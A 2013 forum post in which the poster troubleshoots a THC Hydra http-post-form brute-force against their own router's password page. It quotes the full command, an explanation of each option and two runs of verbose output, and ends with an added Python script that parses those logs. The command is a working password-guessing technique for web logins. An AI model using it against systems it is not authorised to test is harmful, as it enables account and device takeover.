Hydra http-post-form trouble



DaRealMcCloud
2013-07-14, 14:57
Hi there,

I am a bit confused and was wondering if someone could shed some light on the problem I am encountering.

I was trying to use THC Hydra to find the (known) login for my Speedport W700V.
I followed a tutorial in the old Backtrack Forum and thought I knew what was going on after finding the missing bits from other sources online.

To make it quick, here is the command I tried to execute:

hydra -l "" -P /pentest/passwords/wordlists/easy.lst -t 1 -f -v -V 192.168.2.1 http-post-form "/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm"

and this is what I think is happening:
(please correct me if I am wrong)


-l "" blank username (the login requires only a password).


-P /pentest/passwords/wordlists/easy.lst a very limited password list with the correct password in line 3.


-t 1 just one instance


-f stop if password was found.


-v -V be verbose and be even more verbose.


192.168.2.1 http-post-form the IP of the router and using http POST on a form.


"/cgi-bin/login.cgi:pws=^PASS^:F=loginpserr.stm" the tricky bit ;) /cgi-bin/login.cgi is the login script. pws=^PASS^ is the only variable of the script (replace psw with the passwords from the list). F=loginpserr.stm is the part I have wrong, I believe. I am telling hydra here that if it gets an answer which contains "loginpserr.stm", the login wasn't successful. I used this expression after receiving this output from a previous attempt:

[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
...
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
...
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:26:13


I thought the router redirects me to loginpserr.st if incorrect and to wait.st if correct.

My output from the command at the top is as follows:


Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-07-14 15:57:13
[DATA] 1 task, 1 server, 4 login tries (l:1/p:4), ~4 tries per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[STATUS] attack finished for 192.168.2.1 (waiting for children to finish)
1 of 1 target successfuly completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-07-14 15:57:20


Am I on the right track?
Why is there a "" around the last expression?
What's the correct failed condition?
Should I post some screens of the page source?
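
Added example, not part of the original post: a small Python script that pairs each [ATTEMPT] line of Hydra's verbose output with the redirect lines logged after it, so the two runs quoted above can be compared attempt by attempt. The function names are made up for this example, and the sample logs are copied from the post, with the second run's repeated redirect lines shortened.

```python
import re
from collections import Counter

ATTEMPT = re.compile(r'\[ATTEMPT\] .* - pass "(.*)" - \d+ of \d+')
REDIRECT = re.compile(r'\[VERBOSE\] Page redirected to (\S+)')

def redirects_per_attempt(log):
    """Return [(password, [redirect URLs logged before the next attempt])]."""
    attempts = []
    for line in log.splitlines():
        attempt, redirect = ATTEMPT.match(line), REDIRECT.match(line)
        if attempt:
            attempts.append((attempt.group(1), []))
        elif redirect and attempts:
            attempts[-1][1].append(redirect.group(1))
    return attempts

def final_targets(log):
    """Last redirect per attempt; None means no redirect line followed it."""
    return [(pw, urls[-1] if urls else None)
            for pw, urls in redirects_per_attempt(log)]

def outliers(log):
    """Attempts whose final redirect differs from the most common one."""
    finals = final_targets(log)
    common = Counter(url for _, url in finals).most_common(1)[0][0]
    return [(pw, url) for pw, url in finals if url != common]

# Sample logs copied from the post; RUN_2's eight identical redirects are cut to two.
RUN_1 = '''
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/loginpserr.st
'''
RUN_2 = '''
[ATTEMPT] target 192.168.2.1 - login "" - pass "1234" - 1 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "1111" - 2 of 4 [child 0]
[ATTEMPT] target 192.168.2.1 - login "" - pass "0000" - 3 of 4 [child 0]
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[VERBOSE] Page redirected to http://192.168.2.1/wait.st
[ATTEMPT] target 192.168.2.1 - login "" - pass "1235" - 4 of 4 [child 0]
'''

if __name__ == "__main__":
    print(outliers(RUN_1), outliers(RUN_2))
```

In both sample runs only the "0000" attempt ends on wait.st; in the second run the other attempts have no redirect line at all, and the redirect lines repeat after a single attempt instead of appearing once per attempt.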